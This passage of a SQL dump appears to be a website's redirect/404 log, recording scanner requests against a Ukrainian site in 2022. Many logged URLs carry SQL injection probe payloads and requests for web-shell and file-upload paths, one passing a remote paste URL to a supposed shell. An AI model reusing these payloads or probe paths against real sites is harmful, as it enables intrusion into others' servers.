dual)||chr(113)||chr(106)||chr(120)||chr(113)||chr(113)||chr(62))) from dual) and (9149=9149&type=rss',NULL,'','',1,0,'2022-08-05 16:54:40','0000-00-00 00:00:00',301),(37728,'https://malehus.in.ua/?format=feed and 5494=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(112)||chr(107)||chr(107)||chr(113)||(select (case when (5494=5494) then 1 else 0 end) from dual)||chr(113)||chr(106)||chr(120)||chr(113)||chr(113)||chr(62))) from dual)&type=rss',NULL,'','',1,0,'2022-08-05 16:54:40','0000-00-00 00:00:00',301),(37729,'https://malehus.in.ua/?format=feed and 5494=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(112)||chr(107)||chr(107)||chr(113)||(select (case when (5494=5494) then 1 else 0 end) from dual)||chr(113)||chr(106)||chr(120)||chr(113)||chr(113)||chr(62))) from dual)-- hgxg&type=rss',NULL,'','',1,0,'2022-08-05 16:54:40','0000-00-00 00:00:00',301),(37730,'https://malehus.in.ua/?format=feed\') order by 1-- dyrl&type=rss',NULL,'','',1,0,'2022-08-05 16:54:40','0000-00-00 00:00:00',301),(37731,'https://malehus.in.ua/?format=feed\' order by 1-- xutw&type=rss',NULL,'','',1,0,'2022-08-05 16:54:41','0000-00-00 00:00:00',301),(37732,'https://malehus.in.ua/?format=feed) order by 1-- csda&type=rss',NULL,'','',1,0,'2022-08-05 16:54:41','0000-00-00 00:00:00',301),(37733,'https://malehus.in.ua/?format=feed order by 1-- xrbk&type=rss',NULL,'','',1,0,'2022-08-05 16:54:41','0000-00-00 00:00:00',301),(37734,'https://malehus.in.ua/?format=feed order by 1-- bpgt&type=rss',NULL,'','',1,0,'2022-08-05 16:54:41','0000-00-00 00:00:00',301),(37735,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\'xivoxn<\'\">zeqthf',NULL,'','',1,0,'2022-08-05 16:54:57','0000-00-00 00:00:00',301),(37736,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\') and extractvalue(3168,concat(0x5c,0x71786b7071,(select (elt(3168=3168,1))),0x717a6b7171)) and (\'pipe\'=\'pipe',NULL,'','',1,0,'2022-08-05 16:54:57','0000-00-00 00:00:00',301),(37737,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\' and extractvalue(3168,concat(0x5c,0x71786b7071,(select (elt(3168=3168,1))),0x717a6b7171)) and \'wfpp\'=\'wfpp',NULL,'','',1,0,'2022-08-05 16:54:57','0000-00-00 00:00:00',301),(37738,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch) and extractvalue(3168,concat(0x5c,0x71786b7071,(select (elt(3168=3168,1))),0x717a6b7171)) and (5670=5670',NULL,'','',1,0,'2022-08-05 16:54:57','0000-00-00 00:00:00',301),(37739,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch and extractvalue(3168,concat(0x5c,0x71786b7071,(select (elt(3168=3168,1))),0x717a6b7171))',NULL,'','',1,0,'2022-08-05 16:54:58','0000-00-00 00:00:00',301),(37740,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch and extractvalue(3168,concat(0x5c,0x71786b7071,(select (elt(3168=3168,1))),0x717a6b7171))-- mhwz',NULL,'','',1,0,'2022-08-05 16:54:58','0000-00-00 00:00:00',301),(37741,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\') and 9505=cast((chr(113)||chr(120)||chr(107)||chr(112)||chr(113))||(select (case when (9505=9505) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(107)||chr(113)||chr(113)) as numeric) and (\'fsde\'=\'fsde',NULL,'','',1,0,'2022-08-05 16:54:58','0000-00-00 00:00:00',301),(37742,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\' and 9505=cast((chr(113)||chr(120)||chr(107)||chr(112)||chr(113))||(select (case when (9505=9505) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(107)||chr(113)||chr(113)) as numeric) and \'zivp\'=\'zivp',NULL,'','',1,0,'2022-08-05 16:54:58','0000-00-00 00:00:00',301),(37743,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch) and 9505=cast((chr(113)||chr(120)||chr(107)||chr(112)||chr(113))||(select (case when (9505=9505) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(107)||chr(113)||chr(113)) as numeric) and (8958=8958',NULL,'','',1,0,'2022-08-05 16:54:59','0000-00-00 00:00:00',301),(37744,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch and 9505=cast((chr(113)||chr(120)||chr(107)||chr(112)||chr(113))||(select (case when (9505=9505) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(107)||chr(113)||chr(113)) as numeric)',NULL,'','',1,0,'2022-08-05 16:54:59','0000-00-00 00:00:00',301),(37745,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch and 9505=cast((chr(113)||chr(120)||chr(107)||chr(112)||chr(113))||(select (case when (9505=9505) then 1 else 0 end))::text||(chr(113)||chr(122)||chr(107)||chr(113)||chr(113)) as numeric)-- doft',NULL,'','',1,0,'2022-08-05 16:54:59','0000-00-00 00:00:00',301),(37746,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\') and 8820 in (select (char(113)+char(120)+char(107)+char(112)+char(113)+(select (case when (8820=8820) then char(49) else char(48) end))+char(113)+char(122)+char(107)+char(113)+char(113))) and (\'olob\'=\'olob',NULL,'','',1,0,'2022-08-05 16:54:59','0000-00-00 00:00:00',301),(37747,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\' and 8820 in (select (char(113)+char(120)+char(107)+char(112)+char(113)+(select (case when (8820=8820) then char(49) else char(48) end))+char(113)+char(122)+char(107)+char(113)+char(113))) and \'baap\'=\'baap',NULL,'','',1,0,'2022-08-05 16:55:00','0000-00-00 00:00:00',301),(37748,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch) and 8820 in (select (char(113)+char(120)+char(107)+char(112)+char(113)+(select (case when (8820=8820) then char(49) else char(48) end))+char(113)+char(122)+char(107)+char(113)+char(113))) and (5512=5512',NULL,'','',1,0,'2022-08-05 16:55:00','0000-00-00 00:00:00',301),(37749,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch and 8820 in (select (char(113)+char(120)+char(107)+char(112)+char(113)+(select (case when (8820=8820) then char(49) else char(48) end))+char(113)+char(122)+char(107)+char(113)+char(113)))',NULL,'','',1,0,'2022-08-05 16:55:00','0000-00-00 00:00:00',301),(37750,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch and 8820 in (select (char(113)+char(120)+char(107)+char(112)+char(113)+(select (case when (8820=8820) then char(49) else char(48) end))+char(113)+char(122)+char(107)+char(113)+char(113)))-- pmvc',NULL,'','',1,0,'2022-08-05 16:55:00','0000-00-00 00:00:00',301),(37751,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\') and 5113=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(107)||chr(112)||chr(113)||(select (case when (5113=5113) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(107)||chr(113)||chr(113)||chr(62))) from dual) and (\'gcbo\'=\'gcbo',NULL,'','',1,0,'2022-08-05 16:55:01','0000-00-00 00:00:00',301),(37752,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\' and 5113=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(107)||chr(112)||chr(113)||(select (case when (5113=5113) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(107)||chr(113)||chr(113)||chr(62))) from dual) and \'syow\'=\'syow',NULL,'','',1,0,'2022-08-05 16:55:01','0000-00-00 00:00:00',301),(37753,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch) and 5113=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(107)||chr(112)||chr(113)||(select (case when (5113=5113) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(107)||chr(113)||chr(113)||chr(62))) from dual) and (2460=2460',NULL,'','',1,0,'2022-08-05 16:55:01','0000-00-00 00:00:00',301),(37754,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch and 5113=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(107)||chr(112)||chr(113)||(select (case when (5113=5113) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(107)||chr(113)||chr(113)||chr(62))) from dual)',NULL,'','',1,0,'2022-08-05 16:55:01','0000-00-00 00:00:00',301),(37755,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch and 5113=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(107)||chr(112)||chr(113)||(select (case when (5113=5113) then 1 else 0 end) from dual)||chr(113)||chr(122)||chr(107)||chr(113)||chr(113)||chr(62))) from dual)-- mvqm',NULL,'','',1,0,'2022-08-05 16:55:02','0000-00-00 00:00:00',301),(37756,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\') order by 1-- wixo',NULL,'','',1,0,'2022-08-05 16:55:02','0000-00-00 00:00:00',301),(37757,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch\' order by 1-- nvou',NULL,'','',1,0,'2022-08-05 16:55:02','0000-00-00 00:00:00',301),(37758,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch) order by 1-- ibnb',NULL,'','',1,0,'2022-08-05 16:55:02','0000-00-00 00:00:00',301),(37759,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch order by 1-- qrqz',NULL,'','',1,0,'2022-08-05 16:55:02','0000-00-00 00:00:00',301),(37760,'https://malehus.in.ua/component/search/?itemid=104&format=opensearch order by 1-- mcuq',NULL,'','',1,0,'2022-08-05 16:55:03','0000-00-00 00:00:00',301),(37761,'https://malehus.in.ua/windex.php',NULL,'','',1,0,'2022-08-05 18:32:48','0000-00-00 00:00:00',301),(37762,'https://malehus.in.ua/accesson.php',NULL,'','',2,0,'2022-08-05 18:32:58','0000-00-00 00:00:00',301),(37763,'https://malehus.in.ua/wp-slicemap.php',NULL,'','',1,0,'2022-08-05 18:33:12','0000-00-00 00:00:00',301),(37764,'https://malehus.in.ua/wp-commentin.php',NULL,'','',25,0,'2022-08-05 18:33:41','0000-00-00 00:00:00',301),(37765,'https://malehus.in.ua/wikiindex.php',NULL,'','',1,0,'2022-08-05 18:33:44','0000-00-00 00:00:00',301),(37766,'https://malehus.in.ua/wp-stream.php',NULL,'','',1,0,'2022-08-05 18:33:53','0000-00-00 00:00:00',301),(37767,'https://malehus.in.ua/wp-option.php',NULL,'','',1,0,'2022-08-05 18:34:00','0000-00-00 00:00:00',301),(37768,'https://malehus.in.ua/wp-clearline.php',NULL,'','',1,0,'2022-08-05 18:34:04','0000-00-00 00:00:00',301),(37769,'https://malehus.in.ua/wp-blockup.php',NULL,'','',1,0,'2022-08-05 18:34:06','0000-00-00 00:00:00',301),(37770,'https://malehus.in.ua/un.php',NULL,'','',1,0,'2022-08-05 18:34:12','0000-00-00 00:00:00',301),(37771,'https://malehus.in.ua/blue.php',NULL,'','',1,0,'2022-08-05 18:34:29','0000-00-00 00:00:00',301),(37772,'https://malehus.in.ua/wp-blog-post.php',NULL,'','',1,0,'2022-08-05 18:34:32','0000-00-00 00:00:00',301),(37773,'https://malehus.in.ua/wp-craft-report.php',NULL,'','',1,0,'2022-08-05 18:34:44','0000-00-00 00:00:00',301),(37774,'https://malehus.in.ua/outcms.php',NULL,'','',1,0,'2022-08-05 18:35:16','0000-00-00 00:00:00',301),(37775,'https://malehus.in.ua/th3_alpha.php',NULL,'','',1,0,'2022-08-05 18:35:19','0000-00-00 00:00:00',301),(37776,'https://malehus.in.ua/upload_index.php',NULL,'','',1,0,'2022-08-05 18:35:23','0000-00-00 00:00:00',301),(37777,'https://malehus.in.ua/smtphec.php',NULL,'','',2,0,'2022-08-05 18:35:35','0000-00-00 00:00:00',301),(37778,'https://malehus.in.ua/wp-supports.php',NULL,'','',1,0,'2022-08-05 18:35:40','0000-00-00 00:00:00',301),(37779,'https://malehus.in.ua/votes.php',NULL,'','',1,0,'2022-08-05 18:35:44','0000-00-00 00:00:00',301),(37780,'https://malehus.in.ua/wp-mail.php',NULL,'','',1,0,'2022-08-05 18:35:47','0000-00-00 00:00:00',301),(37781,'https://malehus.in.ua/load.php',NULL,'','',1,0,'2022-08-05 18:35:50','0000-00-00 00:00:00',301),(37782,'https://malehus.in.ua/wp-blockdown.php',NULL,'','',1,0,'2022-08-05 18:35:59','0000-00-00 00:00:00',301),(37783,'https://malehus.in.ua/wpecho.php',NULL,'','',1,0,'2022-08-05 18:36:02','0000-00-00 00:00:00',301),(37784,'https://malehus.in.ua/d2.php',NULL,'','',1,0,'2022-08-05 18:36:05','0000-00-00 00:00:00',301),(37785,'https://malehus.in.ua/infodat.php',NULL,'','',1,0,'2022-08-05 18:36:09','0000-00-00 00:00:00',301),(37786,'https://malehus.in.ua/webdata.php',NULL,'','',1,0,'2022-08-05 18:36:12','0000-00-00 00:00:00',301),(37787,'https://malehus.in.ua/web.php',NULL,'','',1,0,'2022-08-05 18:36:18','0000-00-00 00:00:00',301),(37788,'https://www.malehus.in.ua/media/com_phocagallery/js/magnific/jquery.magnific-popup.js',NULL,'','',1,0,'2022-08-06 15:32:18','0000-00-00 00:00:00',301),(37789,'https://malehus.in.ua/',NULL,'','',27,0,'2022-08-09 13:57:47','0000-00-00 00:00:00',301),(37790,'https://malehus.in.ua/admin/upload.php',NULL,'','',1,0,'2022-08-10 15:02:48','0000-00-00 00:00:00',301),(37791,'https://malehus.in.ua/wp-admin/admin-post.php',NULL,'www.google.com','',1,0,'2022-08-12 13:35:12','0000-00-00 00:00:00',301),(37792,'https://malehus.in.ua/wp-content/plugins/instabuilder2/cache/up.php',NULL,'www.google.com','',1,0,'2022-08-12 13:35:12','0000-00-00 00:00:00',301),(37793,'https://malehus.in.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'','',1,0,'2022-08-13 06:52:16','0000-00-00 00:00:00',301),(37794,'https://malehus.in.ua/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'','',1,0,'2022-08-14 18:22:42','0000-00-00 00:00:00',301),(37795,'https://malehus.in.ua/holuby/kinhy/8-novini-2/2537-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-11-misyatsiv-2021-roku',NULL,'','',2,0,'2022-08-15 03:13:28','0000-00-00 00:00:00',301),(37796,'https://malehus.in.ua/sadivnytstvo/zasoby-zakhystu/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',2,0,'2022-08-16 03:56:23','0000-00-00 00:00:00',301),(37797,'https://malehus.in.ua/wp-content/radio.php',NULL,'','',1,0,'2022-08-16 08:51:59','0000-00-00 00:00:00',301),(37798,'https://www.malehus.in.ua/8-novini-2/2537-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-11-misyatsiv-2021-roku',NULL,'','',2,0,'2022-08-17 14:46:54','0000-00-00 00:00:00',301),(37799,'https://malehus.in.ua//wp-includes/id3/license.txt',NULL,'','',7,0,'2022-08-18 08:49:10','0000-00-00 00:00:00',301),(37800,'https://malehus.in.ua/upload/server/php-directory/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-18 10:24:27','0000-00-00 00:00:00',301),(37801,'https://www.malehus.in.ua/oholoshennia/8-novini-2/2537-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-11-misyatsiv-2021-roku',NULL,'','',3,0,'2022-08-18 17:59:15','0000-00-00 00:00:00',301),(37802,'https://malehus.in.ua/upload/server/php-files/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-19 18:53:27','0000-00-00 00:00:00',301),(37803,'https://malehus.in.ua/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css',NULL,'','',1,0,'2022-08-21 06:03:22','0000-00-00 00:00:00',301),(37804,'https://malehus.in.ua/rizni-porady/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',2,0,'2022-08-22 16:09:26','0000-00-00 00:00:00',301),(37805,'https://malehus.in.ua/admin/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-22 16:47:12','0000-00-00 00:00:00',301),(37806,'https://malehus.in.ua/dup-installer/main.installer.php',NULL,'','',1,0,'2022-08-26 02:37:50','0000-00-00 00:00:00',301),(37807,'https://malehus.in.ua/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-26 19:05:59','0000-00-00 00:00:00',301),(37808,'https://malehus.in.ua/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-28 04:34:16','0000-00-00 00:00:00',301),(37809,'https://malehus.in.ua/public/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-29 13:05:13','0000-00-00 00:00:00',301),(37810,'https://malehus.in.ua/assets/js/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-08-31 05:08:50','0000-00-00 00:00:00',301),(37811,'https://malehus.in.ua/debug/default/view?panel=config',NULL,'','',3,0,'2022-08-31 07:30:07','0000-00-00 00:00:00',301),(37812,'https://malehus.in.ua/s/3138352e31332e352e3535/_/;/meta-inf/maven/com.atlassian.jira/jira-webapp-dist/pom.properties',NULL,'','',1,0,'2022-08-31 07:30:08','0000-00-00 00:00:00',301),(37813,'https://malehus.in.ua/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application',NULL,'','',3,0,'2022-08-31 07:30:08','0000-00-00 00:00:00',301),(37814,'https://www.malehus.in.ua/login.action',NULL,'','',3,0,'2022-08-31 07:30:08','0000-00-00 00:00:00',301),(37815,'https://www.malehus.in.ua/about',NULL,'','',3,0,'2022-08-31 07:30:08','0000-00-00 00:00:00',301),(37816,'https://www.malehus.in.ua/debug/default/view?panel=config',NULL,'','',3,0,'2022-08-31 07:30:08','0000-00-00 00:00:00',301),(37817,'https://www.malehus.in.ua/.ds_store',NULL,'','',3,0,'2022-08-31 07:30:08','0000-00-00 00:00:00',301),(37818,'https://www.malehus.in.ua/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application',NULL,'','',3,0,'2022-08-31 07:30:08','0000-00-00 00:00:00',301),(37819,'https://www.malehus.in.ua/s/3138352e31332e352e3535/_/;/meta-inf/maven/com.atlassian.jira/jira-webapp-dist/pom.properties',NULL,'','',1,0,'2022-08-31 07:30:08','0000-00-00 00:00:00',301),(37820,'https://malehus.in.ua/login.action',NULL,'','',3,0,'2022-08-31 07:30:09','0000-00-00 00:00:00',301),(37821,'https://malehus.in.ua/about',NULL,'','',3,0,'2022-08-31 07:30:09','0000-00-00 00:00:00',301),(37822,'https://malehus.in.ua/cpanel',NULL,'','',1,0,'2022-09-01 11:46:32','0000-00-00 00:00:00',301),(37823,'https://malehus.in.ua/assets/plugins/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-09-01 16:24:22','0000-00-00 00:00:00',301),(37824,'https://malehus.in.ua/plugins/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-09-03 04:56:26','0000-00-00 00:00:00',301),(37825,'https://malehus.in.ua/sadivnytstvo/dohliad/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',2,0,'2022-09-05 03:35:02','0000-00-00 00:00:00',301),(37826,'https://malehus.in.ua/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/manage-maps.php',NULL,'','',1,0,'2022-09-06 20:34:58','0000-00-00 00:00:00',301),(37827,'https://malehus.in.ua/wp-content/plugins/superstorefinder-wp/css/ssf-wp-pop.css',NULL,'','',1,0,'2022-09-09 14:36:15','0000-00-00 00:00:00',301),(37828,'https://malehus.in.ua/wp-includes/customize/class-wp-customize-nav-menu.php?new',NULL,'','',1,0,'2022-09-10 02:12:58','0000-00-00 00:00:00',301),(37829,'https://malehus.in.ua/wp-content/themes/un.php?php=https://textbin.net/raw/k9bbqot3ml',NULL,'','',1,0,'2022-09-10 02:13:20','0000-00-00 00:00:00',301),(37830,'https://malehus.in.ua/wp-includes/customize/class-wp-customize-nav-menu.php?null=1',NULL,'','',1,0,'2022-09-10 02:13:28','0000-00-00 00:00:00',301),(37831,'https://malehus.in.ua/991176.php',NULL,'','',1,0,'2022-09-11 05:01:09','0000-00-00 00:00:00',301),(37832,'https://malehus.in.ua/alfa_data/alfacgiapi/ups.php',NULL,'','',1,0,'2022-09-11 05:01:10','0000-00-00 00:00:00',301),(37833,'https://malehus.in.ua/peler.php',NULL,'','',1,0,'2022-09-11 05:01:13','0000-00-00 00:00:00',301),(37834,'https://malehus.in.ua/wp-includes/45.php',NULL,'','',1,0,'2022-09-11 05:01:14','0000-00-00 00:00:00',301),(37835,'https://malehus.in.ua/qb9sl.php',NULL,'','',1,0,'2022-09-11 05:01:16','0000-00-00 00:00:00',301),(37836,'https://malehus.in.ua/123.php',NULL,'','',1,0,'2022-09-11 05:01:17','0000-00-00 00:00:00',301),(37837,'https://malehus.in.ua/wp-admin/jfhyqsfmqp.php',NULL,'','',1,0,'2022-09-11 05:01:18','0000-00-00 00:00:00',301),(37838,'https://malehus.in.ua/wp-admin/9h7zj.php',NULL,'','',1,0,'2022-09-11 05:01:19','0000-00-00 00:00:00',301),(37839,'https://malehus.in.ua/uzgnsomdco.php',NULL,'','',1,0,'2022-09-11 05:01:20','0000-00-00 00:00:00',301),(37840,'https://malehus.in.ua/1s2c4.php',NULL,'','',1,0,'2022-09-11 05:01:21','0000-00-00 00:00:00',301),(37841,'https://malehus.in.ua/wp-content/batm.php',NULL,'','',1,0,'2022-09-11 05:01:22','0000-00-00 00:00:00',301),(37842,'https://malehus.in.ua/55.php',NULL,'','',1,0,'2022-09-11 05:01:22','0000-00-00 00:00:00',301),(37843,'https://malehus.in.ua/wp-admin/css/colors/coffee/marijuana.php',NULL,'','',1,0,'2022-09-11 05:01:23','0000-00-00 00:00:00',301),(37844,'https://malehus.in.ua/lollers.php',NULL,'','',1,0,'2022-09-11 05:01:23','0000-00-00 00:00:00',301),(37845,'https://malehus.in.ua/images/sym403.php',NULL,'','',1,0,'2022-09-11 05:01:24','0000-00-00 00:00:00',301),(37846,'https://malehus.in.ua/wrraqaym.php',NULL,'','',1,0,'2022-09-11 05:01:25','0000-00-00 00:00:00',301),(37847,'https://malehus.in.ua/indexs.php',NULL,'','',1,0,'2022-09-11 05:01:25','0000-00-00 00:00:00',301),(37848,'https://malehus.in.ua/lan1.php',NULL,'','',2,0,'2022-09-11 05:01:26','0000-00-00 00:00:00',301),(37849,'https://malehus.in.ua/ccaef.php',NULL,'','',2,0,'2022-09-11 05:01:27','0000-00-00 00:00:00',301),(37850,'https://malehus.in.ua/aa.php',NULL,'','',1,0,'2022-09-11 05:01:29','0000-00-00 00:00:00',301),(37851,'https://malehus.in.ua/as.php',NULL,'','',2,0,'2022-09-11 05:01:31','0000-00-00 00:00:00',301),(37852,'https://malehus.in.ua/vkgxblstgc.php',NULL,'','',1,0,'2022-09-11 05:01:32','0000-00-00 00:00:00',301),(37853,'https://malehus.in.ua/nmwefvjtcq.php',NULL,'','',1,0,'2022-09-11 05:01:33','0000-00-00 00:00:00',301),(37854,'https://malehus.in.ua/ls.php',NULL,'','',1,0,'2022-09-11 05:01:34','0000-00-00 00:00:00',301),(37855,'https://malehus.in.ua/or.php',NULL,'','',1,0,'2022-09-11 05:01:35','0000-00-00 00:00:00',301),(37856,'https://malehus.in.ua/vendor/phpunit/phpunit/src/util/php/z7.php',NULL,'','',1,0,'2022-09-11 05:01:39','0000-00-00 00:00:00',301),(37857,'https://malehus.in.ua/vendor/phpunit/phpunit/src/util/php/ns.php',NULL,'','',1,0,'2022-09-11 05:01:41','0000-00-00 00:00:00',301),(37858,'https://malehus.in.ua/wp-content/uploads/miniv48.php',NULL,'','',1,0,'2022-09-11 05:01:42','0000-00-00 00:00:00',301),(37859,'https://malehus.in.ua/xccc.php',NULL,'','',1,0,'2022-09-11 05:01:43','0000-00-00 00:00:00',301),(37860,'https://malehus.in.ua/langar.php',NULL,'','',1,0,'2022-09-11 05:01:44','0000-00-00 00:00:00',301),(37861,'https://malehus.in.ua/vendor/phpunit/phpunit/src/util/php/olux.php',NULL,'','',1,0,'2022-09-11 05:01:46','0000-00-00 00:00:00',301),(37862,'https://malehus.in.ua/vendor/phpunit/phpunit/src/util/php/dahqkbfwtd.php',NULL,'','',1,0,'2022-09-11 05:01:47','0000-00-00 00:00:00',301),(37863,'https://malehus.in.ua/wlkpkoyfzt.php',NULL,'','',1,0,'2022-09-11 05:01:48','0000-00-00 00:00:00',301),(37864,'https://malehus.in.ua/class-wp-type-registroy.php',NULL,'','',1,0,'2022-09-11 05:01:49','0000-00-00 00:00:00',301),(37865,'https://malehus.in.ua/wp-admin-configs.php',NULL,'','',1,0,'2022-09-11 05:01:51','0000-00-00 00:00:00',301),(37866,'https://malehus.in.ua/wordpress/fw.php',NULL,'','',1,0,'2022-09-11 05:01:52','0000-00-00 00:00:00',301),(37867,'https://malehus.in.ua/amigo.php',NULL,'','',1,0,'2022-09-11 05:01:53','0000-00-00 00:00:00',301),(37868,'https://malehus.in.ua/wp-admin/css/colors/coffee/alfashell.php',NULL,'','',1,0,'2022-09-11 05:01:53','0000-00-00 00:00:00',301),(37869,'https://malehus.in.ua/cmd.php',NULL,'','',1,0,'2022-09-11 05:01:54','0000-00-00 00:00:00',301),(37870,'https://malehus.in.ua/shv3n0m.php',NULL,'','',1,0,'2022-09-11 05:01:54','0000-00-00 00:00:00',301),(37871,'https://malehus.in.ua/utchiha-dmpg.php',NULL,'','',1,0,'2022-09-11 05:01:56','0000-00-00 00:00:00',301),(37872,'https://malehus.in.ua/wp-thesex.php',NULL,'','',1,0,'2022-09-11 05:01:56','0000-00-00 00:00:00',301),(37873,'https://malehus.in.ua/wp-admin/css/colors/coffee/about.php',NULL,'','',1,0,'2022-09-11 05:01:57','0000-00-00 00:00:00',301),(37874,'https://malehus.in.ua/utchiha-xaw.php',NULL,'','',1,0,'2022-09-11 05:01:57','0000-00-00 00:00:00',301),(37875,'https://malehus.in.ua/post_data.php',NULL,'','',1,0,'2022-09-11 05:01:58','0000-00-00 00:00:00',301),(37876,'https://malehus.in.ua/mst.php',NULL,'','',1,0,'2022-09-11 05:01:59','0000-00-00 00:00:00',301),(37877,'https://malehus.in.ua/utchiha-evusp.php',NULL,'','',1,0,'2022-09-11 05:02:01','0000-00-00 00:00:00',301),(37878,'https://malehus.in.ua/wordpress/32.php',NULL,'','',1,0,'2022-09-11 05:02:01','0000-00-00 00:00:00',301),(37879,'https://malehus.in.ua/fmb97.php',NULL,'','',1,0,'2022-09-11 05:02:02','0000-00-00 00:00:00',301),(37880,'https://malehus.in.ua/wp-includes/simplepie/content/type/shells.php',NULL,'','',1,0,'2022-09-11 05:02:03','0000-00-00 00:00:00',301),(37881,'https://malehus.in.ua/wp-content/ak.php',NULL,'','',1,0,'2022-09-11 05:02:03','0000-00-00 00:00:00',301),(37882,'https://malehus.in.ua/wp-admin/css/colors/coffee/tesla.php',NULL,'','',1,0,'2022-09-11 05:02:04','0000-00-00 00:00:00',301),(37883,'https://malehus.in.ua/wpvitamins.php',NULL,'','',1,0,'2022-09-11 05:02:05','0000-00-00 00:00:00',301),(37884,'https://malehus.in.ua/chitoge.php',NULL,'','',1,0,'2022-09-11 05:02:05','0000-00-00 00:00:00',301),(37885,'https://malehus.in.ua/bbdlp0.php',NULL,'','',1,0,'2022-09-11 05:02:06','0000-00-00 00:00:00',301),(37886,'https://malehus.in.ua/7zq6qx.php',NULL,'','',1,0,'2022-09-11 05:02:07','0000-00-00 00:00:00',301),(37887,'https://malehus.in.ua/echvywcw.php',NULL,'','',1,0,'2022-09-11 05:02:08','0000-00-00 00:00:00',301),(37888,'https://malehus.in.ua/utchiha-peffukrp.php',NULL,'','',1,0,'2022-09-11 05:02:08','0000-00-00 00:00:00',301),(37889,'https://malehus.in.ua/utchiha-hxtjdquj.php',NULL,'','',1,0,'2022-09-11 05:02:09','0000-00-00 00:00:00',301),(37890,'https://malehus.in.ua/tmp/root.php',NULL,'','',1,0,'2022-09-11 05:02:10','0000-00-00 00:00:00',301),(37891,'https://malehus.in.ua/wp-admin/css/colors/coffee/maro.php',NULL,'','',1,0,'2022-09-11 05:02:10','0000-00-00 00:00:00',301),(37892,'https://malehus.in.ua/utchiha-izss.php',NULL,'','',1,0,'2022-09-11 05:02:11','0000-00-00 00:00:00',301),(37893,'https://malehus.in.ua/wp-includes/css/f8myjb.php',NULL,'','',1,0,'2022-09-11 05:02:11','0000-00-00 00:00:00',301),(37894,'https://malehus.in.ua/wp-includes/css/upl.php',NULL,'','',1,0,'2022-09-11 05:02:12','0000-00-00 00:00:00',301),(37895,'https://malehus.in.ua/wp-includes/assets/lx.php',NULL,'','',1,0,'2022-09-11 05:02:13','0000-00-00 00:00:00',301),(37896,'https://malehus.in.ua/wsanon.php',NULL,'','',1,0,'2022-09-11 05:02:14','0000-00-00 00:00:00',301),(37897,'https://malehus.in.ua/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2022-09-11 05:02:15','0000-00-00 00:00:00',301),(37898,'https://malehus.in.ua/imp.php',NULL,'','',1,0,'2022-09-11 05:02:15','0000-00-00 00:00:00',301),(37899,'https://malehus.in.ua/wp-content/plugins/upspy/sllolx.php',NULL,'','',1,0,'2022-09-11 05:02:16','0000-00-00 00:00:00',301),(37900,'https://malehus.in.ua/assets/js/ice.php',NULL,'','',1,0,'2022-09-11 05:02:17','0000-00-00 00:00:00',301),(37901,'https://malehus.in.ua/shell20211028.ph',NULL,'','',1,0,'2022-09-11 05:02:17','0000-00-00 00:00:00',301),(37902,'https://malehus.in.ua/wp-includes/simplepie/content/type/up.php',NULL,'','',1,0,'2022-09-11 